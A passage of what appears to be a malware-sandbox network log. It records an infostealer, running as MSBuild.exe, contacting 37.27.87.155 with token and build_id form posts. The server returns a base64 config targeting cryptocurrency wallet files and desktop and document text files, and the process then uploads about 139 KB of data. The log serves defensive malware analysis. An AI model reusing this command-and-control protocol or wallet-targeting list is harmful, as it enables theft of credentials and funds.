                                                                                                                                                                                                                                                                          2024-04-20 12:28:36 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 49 44 47 43 42 46 42 41 4b 45 42 46 42 4b 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------KECFIDGCBFBAKEBFBKFBContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------KECFIDGCBFBAKEBFBKFBCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:37 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          19192.168.2.44975637.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:37 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:37 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CGCFBFBGHDGDAKECAKJECont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:38 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:38 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          20192.168.2.44975737.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:39 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 453
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:39 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------IIEHJEHDBGHIDGDGHCBGCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:39 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          21192.168.2.44975837.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC264OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 139465
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CFCBFBGDBKJKECAAKKFHCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 38 6d 6c 33 65 74 47 67 37 6b 65 4b 4b 6b 2b 55 2b 31 4a 73 39 44 51 46 79 4d 30 55 34 71 77 37 55 32 6b 4d 4b 4b 4b 4b 41 45 4e 46 46 46 41 77 70 44 53 30 6e 4e 41 42 52 52 52 51 41 47 6b 70 61 4d 55 44 45 6f 6f 6f 6f 41 51 30 55 74 46 41 78 4b 4b 4b 4b 41 45 4e 46 4c 53 55 41 46 49 61 57 69 67 59 6c 46 42 6f 6f 41 54 42 6f 70 61 4f 31 4d 59 6c 4a 53 30 68 6f 41 4b 4b 4b 4b 51 77 70 4b 57 67 30 41 4a 52 52 52 54 47 4a 32 6f 70 61 53 67 41 4e 4e 70 31 46 41 78 74 46 4c 53 47 6d 41 55 68 70 61 4b 41 45 6f 6f 6f 6f 47 4a 52 52 52 51 4d 53 6b 70 31 4a 51 4d 53 69 69 69 67 42 4b 4b 4b 4b 42 69 56 31 50 77 39 2f 35 47 79 4c 2f 41 4b 35 50 2f 4b 75 57 4e 64 54 38 50 66 38 41 6b 62 49 76 2b 75 54 2f 41 4d 71 34 38 77 2f 33 61 66 6f 64 6d 58 2f 37 31 44 31 50 58
                                                                                                                                                                                                                                                                          Data Ascii: 8ml3etGg7keKKk+U+1Js9DQFyM0U4qw7U2kMKKKKAENFFFAwpDS0nNABRRRQAGkpaMUDEooooAQ0UtFAxKKKKAENFLSUAFIaWigYlFBooATBopaO1MYlJS0hoAKKKKQwpKWg0AJRRRTGJ2opaSgANNp1FAxtFLSGmAUhpaKAEooooGJRRRQMSkp1JQMSiiigBKKKKBiV1Pw9/5GyL/AK5P/KuWNdT8Pf8AkbIv+uT/AMq48w/3afodmX/71D1PX
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 58 46 6a 63 79 38 37 41 7a 68 44 75 36 44 4b 5a 52 69 63 34 36 31 51 30 78 4c 6a 78 4e 71 57 73 58 64 74 62 36 54 63 73 6c 76 5a 78 4a 4a 59 61 67 36 77 43 57 4e 6e 62 4b 7a 72 48 6b 73 6f 4b 6e 47 30 67 5a 43 6e 4e 41 48 6f 31 74 63 77 58 6c 74 48 63 32 73 30 63 38 45 71 68 6f 35 59 6e 44 4b 34 50 51 67 6a 67 69 70 61 70 36 56 46 65 77 36 56 62 52 36 6c 4f 73 39 36 73 59 45 30 71 67 59 5a 75 2f 51 41 66 6a 67 5a 39 42 30 71 35 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 56 56 31 4c 2f 41 4a 42 64 35 2f 31 77 66 2f 30 45 31 61 71 72 71 58 2f 49 4c 76 50 2b 75 44 2f 2b 67 6d 67 44 35 73 30 33 2f 6a 30 57 72 66 57 71 75 6d 2f 38 65 69 31 63 78 58 33 6c 4c 34 45 66 46 56 66 6a 59 33 47 4b 53 6e 59 70 43 4b 30 49 47 2f 35 36 55 47 6c 49 70 4b 42 67
                                                                                                                                                                                                                                                                          Data Ascii: XFjcy87AzhDu6DKZRic461Q0xLjxNqWsXdtb6TcslvZxJJYag6wCWNnbKzrHksoKnG0gZCnNAHo1tcwXltHc2s0c8Eqho5YnDK4PQgjgipap6VFew6VbR6lOs96sYE0qgYZu/QAfjgZ9B0q5QAUUUUAFFFFABRRRQAVV1L/AJBd5/1wf/0E1aqrqX/ILvP+uD/+gmgD5s03/j0WrfWqum/8ei1cxX3lL4EfFVfjY3GKSnYpCK0IG/56UGlIpKBg
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 48 4e 65 71 57 30 37 53 57 72 47 54 2f 6a 34 68 66 79 35 63 44 2b 49 59 35 2b 68 42 42 48 73 61 67 31 79 56 5a 66 44 57 6f 4d 76 61 46 67 66 79 72 31 38 74 78 64 61 6a 56 76 4b 63 70 70 36 65 38 37 32 50 4b 7a 54 4b 71 46 53 6b 31 47 4b 67 34 33 65 69 33 30 50 49 4b 4d 55 55 56 39 69 66 42 42 69 6b 70 61 4b 42 69 56 33 6e 77 39 74 62 65 35 74 62 37 7a 34 49 70 64 72 70 74 38 78 41 32 4d 67 2b 74 63 4a 78 58 6f 48 77 33 2f 34 39 74 51 2f 33 30 2f 6b 31 65 62 6d 33 2b 37 50 31 52 37 57 51 2f 77 43 2b 4c 30 5a 31 76 39 6c 36 66 2f 7a 34 57 76 38 41 33 35 58 2f 41 41 70 50 37 4b 30 37 2f 6f 48 32 6e 2f 66 6c 66 38 4b 35 2b 2b 38 51 36 6e 71 65 70 7a 61 58 34 61 68 69 64 6f 44 74 75 62 32 66 50 6c 78 6e 2b 36 50 55 2f 77 43 63 64 36 61 32 6c 2b 4e 59 6c 38 32
                                                                                                                                                                                                                                                                          Data Ascii: HNeqW07SWrGT/j4hfy5cD+IY5+hBBHsag1yVZfDWoMvaFgfyr18txdajVvKcpp6e872PKzTKqFSk1GKg43ei30PIKMUUV9ifBBikpaKBiV3nw9tbe5tb7z4Ipdrpt8xA2Mg+tcJxXoHw3/49tQ/30/k1ebm3+7P1R7WQ/wC+L0Z1v9l6f/z4Wv8A35X/AApP7K07/oH2n/flf8K5++8Q6nqepzaX4ahidoDtub2fPlxn+6PU/wCcd6a2l+NYl82
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 51 7a 77 75 48 55 4e 30 4a 42 7a 7a 58 54 66 38 41 43 77 64 54 2f 77 43 66 57 7a 2f 37 35 66 38 41 2b 4b 72 78 38 64 51 78 4d 71 36 71 55 46 30 74 75 76 4d 2b 6a 79 6e 47 59 4f 6c 68 6e 53 78 4c 33 6c 65 31 6e 32 58 5a 46 37 2f 68 56 65 68 2f 38 2f 65 6f 2f 77 44 66 78 50 38 41 34 69 6b 2f 34 56 58 6f 66 2f 50 33 71 50 38 41 33 38 54 2f 41 4f 49 71 6a 2f 77 73 48 56 50 2b 66 61 79 2f 37 34 66 2f 41 4f 4b 6f 2f 77 43 46 67 36 72 2f 41 4d 2b 31 6c 2f 33 77 2f 77 44 38 56 58 50 37 50 4d 2f 50 37 31 2f 6d 65 68 39 62 79 6a 75 76 75 6c 2f 6b 61 76 6a 4f 31 53 77 38 49 32 46 6e 45 57 4d 63 45 73 63 53 6c 6a 79 51 73 62 41 5a 39 2b 4b 38 39 34 72 63 31 6a 78 54 65 36 33 5a 70 62 58 4d 56 73 69 4c 49 4a 41 59 6c 59 48 49 42 48 63 6e 31 72 44 34 72 30 63 74 6f 31
                                                                                                                                                                                                                                                                          Data Ascii: QzwuHUN0JBzzXTf8ACwdT/wCfWz/75f8A+Krx8dQxMq6qUF0tuvM+jynGYOlhnSxL3le1n2XZF7/hVeh/8/eo/wDfxP8A4ik/4VXof/P3qP8A38T/AOIqj/wsHVP+fay/74f/AOKo/wCFg6r/AM+1l/3w/wD8VXP7PM/P71/meh9byjuvul/kavjO1Sw8I2FnEWMcEscSljyQsbAZ9+K894rc1jxTe63ZpbXMVsiLIJAYlYHIBHcn1rD4r0cto1
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 46 46 46 41 42 53 47 6c 70 44 51 41 55 6c 4c 2b 46 46 4d 42 4b 53 6c 6f 6f 47 4a 52 52 32 6f 6f 41 4b 53 6c 6f 70 6c 43 55 55 74 4a 51 49 53 69 6c 70 4f 61 59 77 70 4b 57 6b 70 41 4a 52 53 39 36 4b 59 78 4b 4b 44 52 51 41 6c 46 4c 53 55 78 69 55 55 74 4b 4b 59 44 63 55 55 34 30 6c 41 78 42 39 34 56 75 33 58 46 77 52 2f 73 72 2f 41 43 46 59 59 36 69 74 32 36 2f 34 2b 54 2f 75 72 2f 49 56 68 55 2b 4e 44 58 78 49 72 34 6f 37 30 37 38 4b 50 77 6f 4e 42 74 46 4f 70 4b 42 69 55 59 7a 53 30 6c 41 42 69 69 6c 70 4b 41 43 69 69 69 67 42 44 51 4b 57 6a 69 67 59 55 6c 4c 53 55 77 47 53 2f 77 44 48 72 63 66 39 63 7a 2f 53 71 47 6d 44 2f 53 47 2f 33 4b 30 4a 66 2b 50 57 34 2f 36 35 6e 2b 59 72 50 30 7a 2f 41 46 37 2f 41 4f 35 52 48 5a 69 4e 47 6c 6f 46 4c 53 47 4a 69
                                                                                                                                                                                                                                                                          Data Ascii: FFFABSGlpDQAUlL+FFMBKSlooGJRR2ooAKSloplCUUtJQISilpOaYwpKWkpAJRS96KYxKKDRQAlFLSUxiUUtKKYDcUU40lAxB94Vu3XFwR/sr/ACFYY6it26/4+T/ur/IVhU+NDXxIr4o7078KPwoNBtFOpKBiUYzS0lABiilpKACiiigBDQKWjigYUlLSUwGS/wDHrcf9cz/SqGmD/SG/3K0Jf+PW4/65n+YrP0z/AF7/AO5RHZiNGloFLSGJi
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 33 63 69 74 4a 30 58 47 66 4c 2f 41 4d 41 39 47 46 56 53 68 7a 66 38 45 35 54 34 67 66 38 41 48 7a 59 2f 37 6a 2f 7a 46 63 62 58 5a 66 45 44 2f 6a 35 73 66 39 78 2f 35 69 75 4e 72 36 6e 4c 66 39 31 68 38 2f 7a 5a 38 44 6e 66 2b 2f 31 50 6c 2b 53 43 69 69 6a 46 64 78 35 59 55 55 59 70 63 55 43 50 58 73 34 72 4b 63 6a 37 52 49 42 2f 66 50 38 41 4f 74 4d 6d 73 6c 7a 2f 41 4b 54 4c 2f 76 6e 2b 64 66 6a 64 5a 36 48 37 56 41 73 6f 61 38 36 31 50 2f 6b 4c 58 6e 2f 58 64 2f 38 41 30 49 31 36 48 47 61 38 39 31 51 46 64 57 76 41 77 49 50 6e 4f 65 66 71 61 2b 6e 34 52 66 37 2b 70 36 4c 38 7a 35 50 69 39 50 32 46 50 31 66 35 46 50 46 47 4b 4d 30 62 71 2b 38 50 67 74 52 63 55 59 70 75 36 6a 4e 41 57 59 36 75 36 2b 48 76 2b 70 31 44 2f 65 6a 2f 41 50 5a 71 34 50 4e 64
                                                                                                                                                                                                                                                                          Data Ascii: 3citJ0XGfL/AMA9GFVShzf8E5T4gf8AHzY/7j/zFcbXZfED/j5sf9x/5iuNr6nLf91h8/zZ8Dnf+/1Pl+SCiijFdx5YUUYpcUCPXs4rKcj7RIB/fP8AOtMmslz/AKTL/vn+dfjdZ6H7VAsoa861P/kLXn/Xd/8A0I16HGa891QFdWvAwIPnOefqa+n4Rf7+p6L8z5Pi9P2FP1f5FPFGKM0bq+8PgtRcUYpu6jNAWY6u6+Hv+p1D/ej/APZq4PNd
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC16355OUTData Raw: 6f 6f 6f 70 6f 59 55 30 30 34 30 6c 41 78 44 53 55 74 4a 51 4e 43 55 55 74 49 61 42 6a 65 39 42 70 61 4b 42 6a 54 52 53 6d 6b 50 53 67 6f 4b 62 53 6d 6b 6f 41 44 53 64 71 57 6b 6f 47 46 49 61 4b 4b 42 69 55 6e 61 6e 55 32 67 59 64 36 53 6c 50 53 6b 6f 47 47 61 53 6c 4e 4a 33 6f 47 42 50 34 30 32 6c 36 43 6b 6f 47 42 70 44 53 6d 6b 6f 47 42 37 30 6c 4c 31 6f 2f 77 41 39 4b 42 69 45 30 67 48 70 51 4f 4b 4b 42 68 36 55 6e 61 6c 70 4d 5a 6f 41 53 6b 7a 2b 50 31 70 78 34 37 55 68 34 7a 51 4d 53 6b 78 53 30 45 38 65 39 41 78 41 50 59 55 6e 70 30 70 51 61 4d 59 46 41 78 44 53 66 7a 70 78 36 63 30 33 48 42 37 5a 6f 47 47 4b 4b 4f 31 48 70 7a 51 41 68 36 66 6a 51 4b 4f 2b 4b 4f 76 66 36 30 44 4f 2b 6c 6c 53 33 75 39 50 75 5a 57 32 77 77 58 73 4d 73 6a 59 4a 77 71
                                                                                                                                                                                                                                                                          Data Ascii: ooopoYU0040lAxDSUtJQNCUUtIaBje9BpaKBjTRSmkPSgoKbSmkoADSdqWkoGFIaKKBiUnanU2gYd6SlPSkoGGaSlNJ3oGBP402l6CkoGBpDSmkoGB70lL1o/wA9KBiE0gHpQOKKBh6UnalpMZoASkz+P1px47Uh4zQMSkxS0E8e9AxAPYUnp0pQaMYFAxDSfzpx6c03HB7ZoGGKKO1HpzQAh6fjQKO+KOvf60DO+llS3u9PuZW2wwXsMsjYJwq
                                                                                                                                                                                                                                                                          2024-04-20 12:28:41 UTC8625OUTData Raw: 2f 41 4d 41 50 37 48 2f 76 2f 68 2f 77 54 31 57 6b 72 79 75 69 6a 2b 31 76 37 6e 34 2f 38 41 66 39 6a 2f 33 2f 41 4d 50 2b 43 65 70 30 56 35 5a 52 52 2f 61 2f 39 7a 38 66 2b 41 48 39 6b 66 33 2f 41 4d 50 2b 43 65 70 55 56 35 62 52 52 2f 61 2f 39 7a 38 66 2b 41 50 2b 79 50 37 2f 41 4f 48 2f 41 41 54 31 47 6b 72 79 2b 69 6a 2b 31 2f 37 6e 34 2f 38 41 41 44 2b 79 50 37 2f 34 66 38 45 39 50 6f 72 7a 43 69 6a 2b 31 2f 37 6e 34 2f 38 41 41 48 2f 5a 50 39 2f 38 50 2b 43 65 6e 55 47 76 4d 61 53 6a 2b 31 2f 37 6e 34 2f 38 41 50 37 4a 2f 76 38 41 34 66 38 41 42 50 54 71 53 76 4d 71 4b 50 37 58 2f 75 66 6a 2f 77 41 41 66 39 6b 2f 33 2f 77 2f 34 4a 36 62 53 56 35 6e 52 52 2f 61 2f 77 44 63 2f 48 2f 67 42 2f 5a 58 39 2f 38 41 44 2f 67 6e 70 5a 70 4b 38 31 6f 70 2f 77
                                                                                                                                                                                                                                                                          Data Ascii: /AMAP7H/v/h/wT1Wkryuij+1v7n4/8Af9j/3/AMP+Cep0V5ZRR/a/9z8f+AH9kf3/AMP+CepUV5bRR/a/9z8f+AP+yP7/AOH/AAT1Gkry+ij+1/7n4/8AAD+yP7/4f8E9PorzCij+1/7n4/8AAH/ZP9/8P+CenUGvMaSj+1/7n4/8AP7J/v8A4f8ABPTqSvMqKP7X/ufj/wAAf9k/3/w/4J6bSV5nRR/a/wDc/H/gB/ZX9/8AD/gnpZpK81op/w
                                                                                                                                                                                                                                                                          2024-04-20 12:28:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:42 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          22192.168.2.44975937.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:43 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDH
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
